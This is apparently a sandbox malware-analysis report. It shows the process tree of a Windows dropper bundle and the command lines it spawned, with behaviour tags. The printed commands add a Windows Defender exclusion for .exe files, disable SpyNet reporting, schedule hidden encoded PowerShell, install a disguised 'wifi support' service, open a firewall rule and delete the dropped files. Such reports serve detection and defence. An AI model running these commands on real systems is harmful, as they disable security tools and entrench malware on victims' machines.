C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8156846f8,0x7ff815684708,0x7ff81568471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings10⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6b0235460,0x7ff6b0235470,0x7ff6b023548011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:810⤵
-
C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_6.exesahiba_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 6247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 12927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13247⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f & erase "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13767⤵
- Program crash
-
C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exeC:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 4247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 4407⤵
- Program crash
-
C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 6007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 9687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 8687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 9687⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 5368⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Program crash
-
C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS5D5.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS1E9C.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
- Executes dropped EXE
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gscIZCLGx" /SC once /ST 01:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gscIZCLGx"9⤵
-
C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe"C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 9007⤵
- Program crash
-
C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe"C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 4447⤵
- Program crash
-
C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rgrsamop\7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iaghphix.exe" C:\Windows\SysWOW64\rgrsamop\7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description rgrsamop "wifi internet conection"7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start rgrsamop7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create rgrsamop binPath= "C:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d\"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe\"" type= own start= auto DisplayName= "wifi support"7⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 12567⤵
- Program crash
-
C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe"C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe"C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 4287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 4407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_5.exesahiba_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_4.exesahiba_4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_3.exesahiba_3.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 10646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_2.exesahiba_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exesahiba_1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe" -a6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_7.exesahiba_7.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2208 -ip 22081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1504 -ip 15041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 1344 -ip 13441⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 1344 -ip 13441⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5628 -ip 56281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5788 -ip 57881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5352 -ip 53521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2132 -ip 21321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5352 -ip 53521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5788 -ip 57881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5424 -ip 54241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5628 -ip 56281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5372 -ip 53721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\rgrsamop\iaghphix.exeC:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 5602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7016 -ip 70161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 464 -ip 4641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 464 -ip 4641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5424 -ip 54241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5424 -ip 54241⤵
-
